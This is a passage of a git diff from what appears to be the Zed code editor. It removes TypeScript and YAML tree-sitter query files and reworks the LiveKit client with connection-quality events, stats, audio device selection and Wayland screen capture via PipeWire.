expressions -( - (call_expression - function: (member_expression - object: (identifier) @_namespace - property: (property_identifier) @_method - ) - (#eq? @_namespace "Deno") - (#eq? @_method "test") - arguments: ( - arguments . (function_expression - name: (identifier) @run @DENO_TEST_NAME - ) - ) - ) @_js-test - - (#set! tag js-test) -) diff --git a/crates/languages/src/typescript/textobjects.scm b/crates/languages/src/typescript/textobjects.scm deleted file mode 100644 index 96289f058cd7b605a8f5b4c8966e3c372022d065..0000000000000000000000000000000000000000 --- a/crates/languages/src/typescript/textobjects.scm +++ /dev/null @@ -1,114 +0,0 @@ -(comment)+ @comment.around - -(function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(method_definition - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(function_expression - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -((arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")) @function.around - (#not-has-parent? @function.around variable_declarator)) - -; Arrow function in variable declaration - capture the full declaration -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (statement_block - "{" - (_)* @function.inside - "}")))) -]) @function.around - -; Arrow function in variable declaration - capture body as @function.inside -; (for statement blocks, the more specific pattern above captures just the contents) -([ - (lexical_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) - (variable_declaration - (variable_declarator - value: (arrow_function - body: (_) @function.inside))) -]) @function.around - -; Catch-all for arrow functions in other contexts (callbacks, etc.) -((arrow_function - body: (_) @function.inside) @function.around - (#not-has-parent? @function.around variable_declarator)) -(function_signature) @function.around - -(generator_function - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(generator_function_declaration - body: (_ - "{" - (_)* @function.inside - "}")) @function.around - -(class_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(class - body: (_ - "{" - (_)* @class.inside - "}" )) @class.around - -(interface_declaration - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(enum_declaration - body: (_ - "{" - [(_) ","?]* @class.inside - "}" )) @class.around - -(ambient_declaration - (module - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" ))) @class.around - -(internal_module - body: (_ - "{" - [(_) ";"?]* @class.inside - "}" )) @class.around - -(type_alias_declaration) @class.around diff --git a/crates/languages/src/yaml/brackets.scm b/crates/languages/src/yaml/brackets.scm deleted file mode 100644 index 0cfc5072d4eeda19d75ce943481670a3ee8938b0..0000000000000000000000000000000000000000 --- a/crates/languages/src/yaml/brackets.scm +++ /dev/null @@ -1,4 +0,0 @@ -("[" @open "]" @close) -("{" @open "}" @close) -(("\"" @open "\"" @close) (#set! rainbow.exclude)) -(("'" @open "'" @close) (#set! rainbow.exclude)) diff --git a/crates/languages/src/yaml/injections.scm b/crates/languages/src/yaml/injections.scm deleted file mode 100644 index c9de25a18f8afb7d8e0c6874401798edede9bce1..0000000000000000000000000000000000000000 --- a/crates/languages/src/yaml/injections.scm +++ /dev/null @@ -1,25 +0,0 @@ -((comment) @injection.content - (#set! injection.language "comment") -) - -; GitHub actions: JavaScript for workflow scripting (inline and block) -(block_mapping - (block_mapping_pair - key: (flow_node) @_uses (#eq? @_uses "uses") - value: (flow_node) @_actions_ghs (#match? @_actions_ghs "^actions/github-script")) - (block_mapping_pair - key: (flow_node) @_with (#eq? @_with "with") - value: (block_node - (block_mapping - (block_mapping_pair - key: (flow_node) @_run (#eq? @_run "script") - value: [ - (flow_node (plain_scalar (string_scalar) @injection.content)) - (block_node (block_scalar) @injection.content) - ] - (#set! injection.language "javascript") - ) - ) - ) - ) -) diff --git a/crates/languages/src/yaml/outline.scm b/crates/languages/src/yaml/outline.scm deleted file mode 100644 index c5a7f8e5d40388c020ec9dab83d6cee02746b581..0000000000000000000000000000000000000000 --- a/crates/languages/src/yaml/outline.scm +++ /dev/null @@ -1,9 +0,0 @@ -(block_mapping_pair - key: - (flow_node - (plain_scalar - (string_scalar) @name)) - value: - (flow_node - (plain_scalar - (string_scalar) @context))?) @item diff --git a/crates/languages/src/yaml/redactions.scm b/crates/languages/src/yaml/redactions.scm deleted file mode 100644 index 85fdbd26ea0fc0b3956652ef48c61a44613337e4..0000000000000000000000000000000000000000 --- a/crates/languages/src/yaml/redactions.scm +++ /dev/null @@ -1 +0,0 @@ -(block_mapping_pair value: (flow_node) @redact) diff --git a/crates/languages/src/zed-keybind-context/brackets.scm b/crates/languages/src/zed-keybind-context/brackets.scm deleted file mode 100644 index d086b2e98df0837208a13f6c6f79db84c204fb99..0000000000000000000000000000000000000000 --- a/crates/languages/src/zed-keybind-context/brackets.scm +++ /dev/null @@ -1 +0,0 @@ -("(" @open ")" @close) diff --git a/crates/line_ending_selector/src/line_ending_indicator.rs b/crates/line_ending_selector/src/line_ending_indicator.rs index ee858d706b3a8152c868a5bd629c112a4d1b225f..9c493344e757174035a30e42126389ced9ea1624 100644 --- a/crates/line_ending_selector/src/line_ending_indicator.rs +++ b/crates/line_ending_selector/src/line_ending_indicator.rs @@ -18,7 +18,7 @@ impl LineEndingIndicator { self.line_ending = None; self.active_editor = None; - if let Some((_, buffer, _)) = editor.read(cx).active_excerpt(cx) { + if let Some(buffer) = editor.read(cx).active_buffer(cx) { let line_ending = buffer.read(cx).line_ending(); self.line_ending = Some(line_ending); self.active_editor = Some(editor.downgrade()); diff --git a/crates/line_ending_selector/src/line_ending_selector.rs b/crates/line_ending_selector/src/line_ending_selector.rs index 504c327a349c97214e801f6bd375d61c7847f2be..455807565f8be52e574327f10d5881bb575c60f3 100644 --- a/crates/line_ending_selector/src/line_ending_selector.rs +++ b/crates/line_ending_selector/src/line_ending_selector.rs @@ -40,7 +40,7 @@ impl LineEndingSelector { fn toggle(editor: &WeakEntity, window: &mut Window, cx: &mut App) { let Some((workspace, buffer)) = editor .update(cx, |editor, cx| { - Some((editor.workspace()?, editor.active_excerpt(cx)?.1)) + Some((editor.workspace()?, editor.active_buffer(cx)?)) }) .ok() .flatten() diff --git a/crates/livekit_client/Cargo.toml b/crates/livekit_client/Cargo.toml index e4c530bbcb3864cf2557f15ef02ddbe7e81852c7..42c13f094c1893260f474c98f650ba83be832ef0 100644 --- a/crates/livekit_client/Cargo.toml +++ b/crates/livekit_client/Cargo.toml @@ -40,15 +40,16 @@ serde.workspace = true serde_urlencoded.workspace = true settings.workspace = true smallvec.workspace = true -tokio-tungstenite.workspace = true ui.workspace = true util.workspace = true [target.'cfg(not(any(all(target_os = "windows", target_env = "gnu"), target_os = "freebsd")))'.dependencies] -libwebrtc = { rev = "5f04705ac3f356350ae31534ffbc476abc9ea83d", git = "https://github.com/zed-industries/livekit-rust-sdks" } -livekit = { rev = "5f04705ac3f356350ae31534ffbc476abc9ea83d", git = "https://github.com/zed-industries/livekit-rust-sdks", features = [ - "__rustls-tls" -] } +libwebrtc.workspace = true +livekit.workspace = true + +[target.'cfg(target_os = "linux")'.dependencies] +tokio = { workspace = true, features = ["time"] } +webrtc-sys.workspace = true [target.'cfg(any(target_os = "linux", target_os = "freebsd", target_os = "windows"))'.dependencies] scap.workspace = true @@ -64,7 +65,6 @@ objc.workspace = true collections = { workspace = true, features = ["test-support"] } gpui = { workspace = true, features = ["test-support"] } gpui_platform.workspace = true -sha2.workspace = true simplelog.workspace = true [build-dependencies] diff --git a/crates/livekit_client/examples/test_app.rs b/crates/livekit_client/examples/test_app.rs index 06b9a1402a5c313117dfe559d1f293b6393c6172..eb87aa6cae4530f31fa778b162d585de0cbb253b 100644 --- a/crates/livekit_client/examples/test_app.rs +++ b/crates/livekit_client/examples/test_app.rs @@ -35,15 +35,7 @@ fn main() { cx.activate(true); cx.on_action(quit); cx.bind_keys([KeyBinding::new("cmd-q", Quit, None)]); - cx.set_menus(vec![Menu { - name: "Zed".into(), - items: vec![MenuItem::Action { - name: "Quit".into(), - action: Box::new(Quit), - os_action: None, - checked: false, - }], - }]); + cx.set_menus([Menu::new("Zed").items([MenuItem::action("Quit", Quit)])]); let livekit_url = std::env::var("LIVEKIT_URL").unwrap_or("http://localhost:7880".into()); let livekit_key = std::env::var("LIVEKIT_KEY").unwrap_or("devkey".into()); @@ -255,7 +247,7 @@ impl LivekitWindow { } else { let room = self.room.clone(); cx.spawn_in(window, async move |this, cx| { - let (publication, stream) = room + let (publication, stream, _input_lag_us) = room .publish_local_microphone_track("test_user".to_string(), false, cx) .await .unwrap(); diff --git a/crates/livekit_client/src/lib.rs b/crates/livekit_client/src/lib.rs index be008d8db5108fb087415edb9d2de91bad19ab97..aa4831562c2f70cf505d1042f1c9446504dce9fd 100644 --- a/crates/livekit_client/src/lib.rs +++ b/crates/livekit_client/src/lib.rs @@ -1,8 +1,8 @@ use anyhow::Context as _; use collections::HashMap; +use cpal::DeviceId; mod remote_video_track_view; -use cpal::traits::HostTrait as _; pub use remote_video_track_view::{RemoteVideoTrackView, RemoteVideoTrackViewEvent}; use rodio::DeviceTrait as _; @@ -67,6 +67,14 @@ pub enum Participant { Remote(RemoteParticipant), } +#[derive(Copy, Clone, Debug, Eq, PartialEq, PartialOrd, Ord)] +pub enum ConnectionQuality { + Excellent, + Good, + Poor, + Lost, +} + #[derive(Debug, Clone)] pub enum TrackPublication { Local(LocalTrackPublication), @@ -179,6 +187,10 @@ pub enum RoomEvent { ActiveSpeakersChanged { speakers: Vec, }, + ConnectionQualityChanged { + participant: Participant, + quality: ConnectionQuality, + }, ConnectionStateChanged(ConnectionState), Connected { participants_with_tracks: Vec<(RemoteParticipant, Vec)>, @@ -192,24 +204,18 @@ pub enum RoomEvent { pub(crate) fn default_device( input: bool, + device_id: Option<&DeviceId>, ) -> anyhow::Result<(cpal::Device, cpal::SupportedStreamConfig)> { - let device; - let config; - if input { - device = cpal::default_host() - .default_input_device() - .context("no audio input device available")?; - config = device + let device = audio::resolve_device(device_id, input)?; + let config = if input { + device .default_input_config() - .context("failed to get default input config")?; + .context("failed to get default input config")? } else { - device = cpal::default_host() - .default_output_device() - .context("no audio output device available")?; - config = device + device .default_output_config() - .context("failed to get default output config")?; - } + .context("failed to get default output config")? + }; Ok((device, config)) } diff --git a/crates/livekit_client/src/livekit_client.rs b/crates/livekit_client/src/livekit_client.rs index 6fc1d3415a493e7e1989472616015916a82cf818..1c1cc5c3b7075b90950d85bbc92ba186a4f415ba 100644 --- a/crates/livekit_client/src/livekit_client.rs +++ b/crates/livekit_client/src/livekit_client.rs @@ -1,21 +1,21 @@ -use std::sync::Arc; - -use anyhow::{Context as _, Result, anyhow}; +use anyhow::{Context as _, Result}; use audio::AudioSettings; use collections::HashMap; use futures::{SinkExt, channel::mpsc}; use gpui::{App, AsyncApp, ScreenCaptureSource, ScreenCaptureStream, Task}; use gpui_tokio::Tokio; -use log::info; + use playback::capture_local_video_track; use settings::Settings; +use std::sync::{Arc, atomic::AtomicU64}; +#[cfg(target_os = "linux")] +mod linux; mod playback; -use crate::{ - LocalTrack, Participant, RemoteTrack, RoomEvent, TrackPublication, - livekit_client::playback::Speaker, -}; +use crate::{ConnectionQuality, LocalTrack, Participant, RemoteTrack, RoomEvent, TrackPublication}; +pub use livekit::SessionStats; +pub use livekit::webrtc::stats::RtcStats; pub use playback::AudioStream; pub(crate) use playback::{RemoteVideoFrame, play_remote_video_track}; @@ -54,10 +54,8 @@ impl Room { token: String, cx: &mut AsyncApp, ) -> Result<(Self, mpsc::UnboundedReceiver)> { - let connector = - tokio_tungstenite::Connector::Rustls(Arc::new(http_client_tls::tls_config())); let mut config = livekit::RoomOptions::default(); - config.connector = Some(connector); + config.tls_config = livekit::TlsConfig(Some(http_client_tls::tls_config())); let (room, mut events) = Tokio::spawn(cx, async move { livekit::Room::connect(&url, &token, config).await }) @@ -111,8 +109,8 @@ impl Room { user_name: String, is_staff: bool, cx: &mut AsyncApp, - ) -> Result<(LocalTrackPublication, playback::AudioStream)> { - let (track, stream) = self + ) -> Result<(LocalTrackPublication, playback::AudioStream, Arc)> { + let (track, stream, input_lag_us) = self .playback .capture_local_microphone_track(user_name, is_staff, &cx)?; let publication = self @@ -127,7 +125,7 @@ impl Room { ) .await?; - Ok((publication, stream)) + Ok((publication, stream, input_lag_us)) } pub async fn unpublish_local_track( @@ -143,25 +141,37 @@ impl Room { track: &RemoteAudioTrack, cx: &mut App, ) -> Result { - let speaker: Speaker = - serde_urlencoded::from_str(&track.0.name()).unwrap_or_else(|_| Speaker { - name: track.0.name(), - is_staff: false, - sends_legacy_audio: true, - }); - - if AudioSettings::get_global(cx).rodio_audio { - info!("Using experimental.rodio_audio audio pipeline for output"); - playback::play_remote_audio_track(&track.0, speaker, cx) - } else if speaker.sends_legacy_audio { - Ok(self.playback.play_remote_audio_track(&track.0)) - } else { - Err(anyhow!("Client version too old to play audio in call")) - } + let output_audio_device = AudioSettings::get_global(cx).output_audio_device.clone(); + Ok(self + .playback + .play_remote_audio_track(&track.0, output_audio_device)) + } + + pub async fn get_stats(&self) -> Result { + self.room.get_stats().await.map_err(anyhow::Error::from) + } + + /// Returns a `Task` that fetches room stats on the Tokio runtime. + /// + /// LiveKit's SDK is Tokio-based, so the stats fetch must run within + /// a Tokio context rather than on GPUI's smol-based background executor. + pub fn stats_task(&self, cx: &impl gpui::AppContext) -> Task> { + let inner = self.room.clone(); + Tokio::spawn_result(cx, async move { + inner.get_stats().await.map_err(anyhow::Error::from) + }) } } impl LocalParticipant { + pub fn connection_quality(&self) -> ConnectionQuality { + connection_quality_from_livekit(self.0.connection_quality()) + } + + pub fn audio_level(&self) -> f32 { + self.0.audio_level() + } + pub async fn publish_screenshare_track( &self, source: &dyn ScreenCaptureSource, @@ -206,6 +216,33 @@ impl LocalParticipant { .map(LocalTrackPublication) .context("unpublishing a track") } + + #[cfg(target_os = "linux")] + pub async fn publish_screenshare_track_wayland( + &self, + cx: &mut AsyncApp, + ) -> Result<( + LocalTrackPublication, + Box, + futures::channel::oneshot::Receiver<()>, + )> { + let (track, stop_flag, feed_task, failure_rx) = + linux::start_wayland_desktop_capture(cx).await?; + let options = livekit::options::TrackPublishOptions { + source: livekit::track::TrackSource::Screenshare, + video_codec: livekit::options::VideoCodec::VP8, + ..Default::default() + }; + let publication = self + .publish_track(livekit::track::LocalTrack::Video(track.0), options, cx) + .await?; + + Ok(( + publication, + Box::new(linux::WaylandScreenCaptureStream::new(stop_flag, feed_task)), + failure_rx, + )) + } } impl LocalTrackPublication { @@ -235,6 +272,14 @@ impl LocalTrackPublication { } impl RemoteParticipant { + pub fn connection_quality(&self) -> ConnectionQuality { + connection_quality_from_livekit(self.0.connection_quality()) + } + + pub fn audio_level(&self) -> f32 { + self.0.audio_level() + } + pub fn identity(&self) -> ParticipantIdentity { ParticipantIdentity(self.0.identity().0) } @@ -298,6 +343,31 @@ impl Participant { } } } + + pub fn connection_quality(&self) -> ConnectionQuality { + match self { + Participant::Local(local_participant) => local_participant.connection_quality(), + Participant::Remote(remote_participant) => remote_participant.connection_quality(), + } + } + + pub fn audio_level(&self) -> f32 { + match self { + Participant::Local(local_participant) => local_participant.audio_level(), + Participant::Remote(remote_participant) => remote_participant.audio_level(), + } + } +} + +fn connection_quality_from_livekit( + quality: livekit::prelude::ConnectionQuality, +) -> ConnectionQuality { + match quality { + livekit::prelude::ConnectionQuality::Excellent => ConnectionQuality::Excellent, + livekit::prelude::ConnectionQuality::Good => ConnectionQuality::Good, + livekit::prelude::ConnectionQuality::Poor => ConnectionQuality::Poor, + livekit::prelude::ConnectionQuality::Lost => ConnectionQuality::Lost, + } } fn participant_from_livekit(participant: livekit::participant::Participant) -> Participant { @@ -475,6 +545,13 @@ fn room_event_from_livekit(event: livekit::RoomEvent) -> Option { }, livekit::RoomEvent::Reconnecting => RoomEvent::Reconnecting, livekit::RoomEvent::Reconnected => RoomEvent::Reconnected, + livekit::RoomEvent::ConnectionQualityChanged { + quality, + participant, + } => RoomEvent::ConnectionQualityChanged { + participant: participant_from_livekit(participant), + quality: connection_quality_from_livekit(quality), + }, _ => { log::trace!("dropping livekit event: {:?}", event); return None; diff --git a/crates/livekit_client/src/livekit_client/linux.rs b/crates/livekit_client/src/livekit_client/linux.rs new file mode 100644 index 0000000000000000000000000000000000000000..fe7189e901dc8586dbcbdfadbc7a8a0ef5fb1e5d --- /dev/null +++ b/crates/livekit_client/src/livekit_client/linux.rs @@ -0,0 +1,203 @@ +use anyhow::Result; +use futures::StreamExt as _; +use futures::channel::oneshot; +use gpui::{AsyncApp, ScreenCaptureStream}; +use livekit::track; +use livekit::webrtc::{ + prelude::NV12Buffer, + video_frame::{VideoFrame, VideoRotation}, + video_source::{RtcVideoSource, VideoResolution, native::NativeVideoSource}, +}; +use std::sync::{ + Arc, + atomic::{AtomicBool, AtomicU64, Ordering}, +}; + +static NEXT_WAYLAND_SHARE_ID: AtomicU64 = AtomicU64::new(1); +const PIPEWIRE_TIMEOUT_S: u64 = 30; + +pub struct WaylandScreenCaptureStream { + id: u64, + stop_flag: Arc, + _capture_task: gpui::Task<()>, +} + +impl WaylandScreenCaptureStream { + pub fn new(stop_flag: Arc, capture_task: gpui::Task<()>) -> Self { + Self { + id: NEXT_WAYLAND_SHARE_ID.fetch_add(1, Ordering::Relaxed), + stop_flag, + _capture_task: capture_task, + } + } +} + +impl ScreenCaptureStream for WaylandScreenCaptureStream { + fn metadata(&self) -> Result { + Ok(gpui::SourceMetadata { + id: self.id, + label: None, + is_main: None, + resolution: gpui::size(gpui::DevicePixels(1), gpui::DevicePixels(1)), + }) + } +} + +impl Drop for WaylandScreenCaptureStream { + fn drop(&mut self) { + self.stop_flag.store(true, Ordering::Release); + } +} + +pub(crate) async fn start_wayland_desktop_capture( + cx: &mut AsyncApp, +) -> Result<( + crate::LocalVideoTrack, + Arc, + gpui::Task<()>, + oneshot::Receiver<()>, +)> { + use futures::channel::mpsc; + use gpui::FutureExt as _; + use libwebrtc::desktop_capturer::{ + CaptureError, DesktopCaptureSourceType, DesktopCapturer, DesktopCapturerOptions, + DesktopFrame, + }; + use libwebrtc::native::yuv_helper::argb_to_nv12; + use std::time::Duration; + use webrtc_sys::webrtc::ffi as webrtc_ffi; + + fn webrtc_log_callback(message: String, severity: webrtc_ffi::LoggingSeverity) { + match severity { + webrtc_ffi::LoggingSeverity::Error => log::error!("[webrtc] {}", message.trim()), + _ => log::debug!("[webrtc] {}", message.trim()), + } + } + + let _webrtc_log_sink = webrtc_ffi::new_log_sink(webrtc_log_callback); + log::debug!("Wayland desktop capture: WebRTC internal logging enabled"); + + let stop_flag = Arc::new(AtomicBool::new(false)); + let (mut video_source_tx, mut video_source_rx) = mpsc::channel::(1); + let (failure_tx, failure_rx) = oneshot::channel::<()>(); + + let mut options = DesktopCapturerOptions::new(DesktopCaptureSourceType::Generic); + options.set_include_cursor(true); + let mut capturer = DesktopCapturer::new(options).ok_or_else(|| { + anyhow::anyhow!( + "Failed to create desktop capturer. \ + Check that xdg-desktop-portal is installed and running." + ) + })?; + + let permanent_error = Arc::new(AtomicBool::new(false)); + let stop_cb = stop_flag.clone(); + let permanent_error_cb = permanent_error.clone(); + capturer.start_capture(None, { + let mut video_source: Option = None; + let mut current_width: u32 = 0; + let mut current_height: u32 = 0; + let mut video_frame = VideoFrame { + rotation: VideoRotation::VideoRotation0, + buffer: NV12Buffer::new(1, 1), + timestamp_us: 0, + }; + + move |result: Result| { + let frame = match result { + Ok(frame) => frame, + Err(CaptureError::Temporary) => return, + Err(CaptureError::Permanent) => { + log::error!("Wayland desktop capture encountered a permanent error"); + permanent_error_cb.store(true, Ordering::Release); + stop_cb.store(true, Ordering::Release); + return; + } + }; + + let width = frame.width() as u32; + let height = frame.height() as u32; + if width != current_width || height != current_height { + current_width = width; + current_height = height; + video_frame.buffer = NV12Buffer::new(width, height); + } + + let (stride_y, stride_uv) = video_frame.buffer.strides(); + let (data_y, data_uv) = video_frame.buffer.data_mut(); + argb_to_nv12( + frame.data(), + frame.stride(), + data_y, + stride_y, + data_uv, + stride_uv, + width as i32, + height as i32, + ); + + if let Some(source) = &video_source { + source.capture_frame(&video_frame); + } else { + let source = NativeVideoSource::new(VideoResolution { width, height }, true); + source.capture_frame(&video_frame); + video_source_tx.try_send(source.clone()).ok(); + video_source = Some(source); + } + } + }); + + log::info!("Wayland desktop capture: starting capture loop"); + + let stop = stop_flag.clone(); + let tokio_task = gpui_tokio::Tokio::spawn(cx, async move { + loop { + if stop.load(Ordering::Acquire) { + break; + } + capturer.capture_frame(); + tokio::time::sleep(Duration::from_millis(33)).await; + } + drop(capturer); + + if permanent_error.load(Ordering::Acquire) { + log::error!("Wayland screen capture ended due to a permanent capture error"); + let _ = failure_tx.send(()); + } + }); + + let capture_task = cx.background_executor().spawn(async move { + if let Err(error) = tokio_task.await { + log::error!("Wayland capture task failed: {error}"); + } + }); + + let executor = cx.background_executor().clone(); + let video_source = video_source_rx + .next() + .with_timeout(Duration::from_secs(PIPEWIRE_TIMEOUT_S), &executor) + .await + .map_err(|_| { + stop_flag.store(true, Ordering::Relaxed); + log::error!("Wayland desktop capture timed out."); + anyhow::anyhow!( + "Screen sharing timed out waiting for the first frame. \ + Check that xdg-desktop-portal and PipeWire are running, \ + and that your portal backend matches your compositor." + ) + })? + .ok_or_else(|| { + stop_flag.store(true, Ordering::Relaxed); + anyhow::anyhow!( + "Screen sharing was canceled or the portal denied permission. \ + You can try again from the screen share button." + ) + })?; + + let track = super::LocalVideoTrack(track::LocalVideoTrack::create_video_track( + "screen share", + RtcVideoSource::Native(video_source), + )); + + Ok((track, stop_flag, capture_task, failure_rx)) +} diff --git a/crates/livekit_client/src/livekit_client/playback.rs b/crates/livekit_client/src/livekit_client/playback.rs index 6e39c2abfb4162ceaa43373f4170a41ffdb36351..cea5b1169b0c1c0c6b699884e107cf24795f5d9c 100644 --- a/crates/livekit_client/src/livekit_client/playback.rs +++ b/crates/livekit_client/src/livekit_client/playback.rs @@ -1,8 +1,9 @@ use anyhow::{Context as _, Result}; -use audio::{AudioSettings, CHANNEL_COUNT, LEGACY_CHANNEL_COUNT, LEGACY_SAMPLE_RATE, SAMPLE_RATE}; +use audio::{AudioSettings, CHANNEL_COUNT, SAMPLE_RATE}; +use cpal::DeviceId; use cpal::traits::{DeviceTrait, StreamTrait as _}; -use futures::channel::mpsc::UnboundedSender; +use futures::channel::mpsc::Sender; use futures::{Stream, StreamExt as _}; use gpui::{ AsyncApp, BackgroundExecutor, Priority, ScreenCaptureFrame, ScreenCaptureSource, @@ -22,16 +23,21 @@ use livekit::webrtc::{ use log::info; use parking_lot::Mutex; use rodio::Source; +use rodio::conversions::SampleTypeConverter; +use rodio::source::{AutomaticGainControlSettings, LimitSettings}; use serde::{Deserialize, Serialize}; use settings::Settings; use std::cell::RefCell; use std::sync::Weak; -use std::sync::atomic::{AtomicBool, AtomicI32, Ordering}; -use std::time::Duration; -use std::{borrow::Cow, collections::VecDeque, sync::Arc, thread}; +use std::sync::atomic::{AtomicI32, AtomicU64, Ordering}; +use std::time::{Duration, Instant}; +use std::{borrow::Cow, collections::VecDeque, sync::Arc}; use util::{ResultExt as _, maybe}; -mod source; +struct TimestampedFrame { + frame: AudioFrame<'static>, + captured_at: Instant, +} pub(crate) struct AudioStack { executor: BackgroundExecutor, @@ -41,38 +47,6 @@ pub(crate) struct AudioStack { next_ssrc: AtomicI32, } -pub(crate) fn play_remote_audio_track( - track: &livekit::track::RemoteAudioTrack, - speaker: Speaker, - cx: &mut gpui::App, -) -> Result { - info!("speaker: {speaker:?}"); - let stream = - source::LiveKitStream::new(cx.background_executor(), track, speaker.sends_legacy_audio); - - let stop_handle = Arc::new(AtomicBool::new(false)); - let stop_handle_clone = stop_handle.clone(); - let stream = stream - .stoppable() - .periodic_access(Duration::from_millis(50), move |s| { - if stop_handle.load(Ordering::Relaxed) { - s.stop(); - } - }); - - info!("sample_rate: {:?}", stream.sample_rate()); - info!("channel_count: {:?}", stream.channels()); - audio::Audio::play_voip_stream(stream, speaker.name, speaker.is_staff, cx) - .context("Could not play audio")?; - - let on_drop = util::defer(move || { - stop_handle_clone.store(true, Ordering::Relaxed); - }); - Ok(AudioStream::Output { - _drop: Box::new(on_drop), - }) -} - impl AudioStack { pub(crate) fn new(executor: BackgroundExecutor) -> Self { let apm = Arc::new(Mutex::new(apm::AudioProcessingModule::new( @@ -91,14 +65,15 @@ impl AudioStack { pub(crate) fn play_remote_audio_track( &self, track: &livekit::track::RemoteAudioTrack, + output_audio_device: Option, ) -> AudioStream { - let output_task = self.start_output(); + let output_task = self.start_output(output_audio_device); let next_ssrc = self.next_ssrc.fetch_add(1, Ordering::Relaxed); let source = AudioMixerSource { ssrc: next_ssrc, - sample_rate: LEGACY_SAMPLE_RATE.get(), - num_channels: LEGACY_CHANNEL_COUNT.get() as u32, + sample_rate: SAMPLE_RATE.get(), + num_channels: CHANNEL_COUNT.get() as u32, buffer: Arc::default(), }; self.mixer.lock().add_source(source.clone()); @@ -109,7 +84,7 @@ impl AudioStack { source.num_channels as i32, ); - let receive_task = self.executor.spawn({ + let receive_task = self.executor.spawn_with_priority(Priority::RealtimeAudio, { let source = source.clone(); async move { while let Some(frame) = stream.next().await { @@ -130,19 +105,22 @@ impl AudioStack { } } - fn start_output(&self) -> Arc> { + fn start_output(&self, output_audio_device: Option) -> Arc> { if let Some(task) = self._output_task.borrow().upgrade() { return task; } let task = Arc::new(self.executor.spawn({ let apm = self.apm.clone(); let mixer = self.mixer.clone(); + let executor = self.executor.clone(); async move { Self::play_output( + executor, apm, mixer, - LEGACY_SAMPLE_RATE.get(), - LEGACY_CHANNEL_COUNT.get().into(), + SAMPLE_RATE.get(), + CHANNEL_COUNT.get().into(), + output_audio_device, ) .await .log_err(); @@ -157,33 +135,18 @@ impl AudioStack { user_name: String, is_staff: bool, cx: &AsyncApp, - ) -> Result<(crate::LocalAudioTrack, AudioStream)> { - let legacy_audio_compatible = - AudioSettings::try_read_global(cx, |setting| setting.legacy_audio_compatible) - .unwrap_or(true); - - let source = if legacy_audio_compatible { - NativeAudioSource::new( - // n.b. this struct's options are always ignored, noise cancellation is provided by apm. - AudioSourceOptions::default(), - LEGACY_SAMPLE_RATE.get(), - LEGACY_CHANNEL_COUNT.get().into(), - 10, - ) - } else { - NativeAudioSource::new( - // n.b. this struct's options are always ignored, noise cancellation is provided by apm. - AudioSourceOptions::default(), - SAMPLE_RATE.get(), - CHANNEL_COUNT.get().into(), - 10, - ) - }; + ) -> Result<(crate::LocalAudioTrack, AudioStream, Arc)> { + let source = NativeAudioSource::new( + // n.b. this struct's options are always ignored, noise cancellation is provided by apm. + AudioSourceOptions::default(), + SAMPLE_RATE.get(), + CHANNEL_COUNT.get().into(), + 10, + ); let speaker = Speaker { name: user_name, is_staff, - sends_legacy_audio: legacy_audio_compatible, }; log::info!("Microphone speaker: {speaker:?}"); let track_name = serde_urlencoded::to_string(speaker) @@ -196,35 +159,31 @@ impl AudioStack { let apm = self.apm.clone(); - let (frame_tx, mut frame_rx) = futures::channel::mpsc::unbounded(); - let transmit_task = self.executor.spawn({ + let input_lag_us = Arc::new(AtomicU64::new(0)); + let (frame_tx, mut frame_rx) = futures::channel::mpsc::channel::(1); + let transmit_task = self.executor.spawn_with_priority(Priority::RealtimeAudio, { + let input_lag_us = input_lag_us.clone(); async move { - while let Some(frame) = frame_rx.next().await { - source.capture_frame(&frame).await.log_err(); + while let Some(timestamped) = frame_rx.next().await { + let lag = timestamped.captured_at.elapsed(); + input_lag_us.store(lag.as_micros() as u64, Ordering::Relaxed); + source.capture_frame(×tamped.frame).await.log_err(); } } }); - let rodio_pipeline = - AudioSettings::try_read_global(cx, |setting| setting.rodio_audio).unwrap_or_default(); - let capture_task = if rodio_pipeline { - info!("Using experimental.rodio_audio audio pipeline"); - let voip_parts = audio::VoipParts::new(cx)?; - // Audio needs to run real-time and should never be paused. That is - // why we are using a normal std::thread and not a background task - self.executor - .spawn_with_priority(Priority::RealtimeAudio, async move { - // microphone is non send on mac - let microphone = audio::Audio::open_microphone(voip_parts)?; - send_to_livekit(frame_tx, microphone); - Ok(()) - }) - } else { + let capture_task = { + let input_audio_device = + AudioSettings::try_read_global(cx, |settings| settings.input_audio_device.clone()) + .flatten(); + let executor = self.executor.clone(); self.executor.spawn(async move { Self::capture_input( + executor, apm, frame_tx, - LEGACY_SAMPLE_RATE.get(), - LEGACY_CHANNEL_COUNT.get().into(), + SAMPLE_RATE.get(), // TODO(audio): was legacy removed for now + CHANNEL_COUNT.get().into(), + input_audio_device, ) .await }) @@ -239,14 +198,17 @@ impl AudioStack { AudioStream::Output { _drop: Box::new(on_drop), }, + input_lag_us, )) } async fn play_output( + executor: BackgroundExecutor, apm: Arc>, mixer: Arc>, sample_rate: u32, - num_channels: u32, + _num_channels: u32, + output_audio_device: Option, ) -> Result<()> { // Prevent App Nap from throttling audio playback on macOS. // This guard is held for the entire duration of audio output. @@ -255,16 +217,17 @@ impl AudioStack { loop { let mut device_change_listener = DeviceChangeListener::new(false)?; - let (output_device, output_config) = crate::default_device(false)?; + let (output_device, output_config) = + crate::default_device(false, output_audio_device.as_ref())?; + info!("Output config: {output_config:?}"); let (end_on_drop_tx, end_on_drop_rx) = std::sync::mpsc::channel::<()>(); let mixer = mixer.clone(); let apm = apm.clone(); let mut resampler = audio_resampler::AudioResampler::default(); let mut buf = Vec::new(); - thread::Builder::new() - .name("AudioPlayback".to_owned()) - .spawn(move || { + executor + .spawn_with_priority(Priority::RealtimeAudio, async move { let output_stream = output_device.build_output_stream( &output_config.config(), { @@ -287,7 +250,12 @@ impl AudioStack { let sampled = resampler.remix_and_resample( mixed, sample_rate / 100, - num_channels, + // We need to assume output number of channels as otherwise we will + // crash in process_reverse_stream otherwise as livekit's audio resampler + // does not seem to support 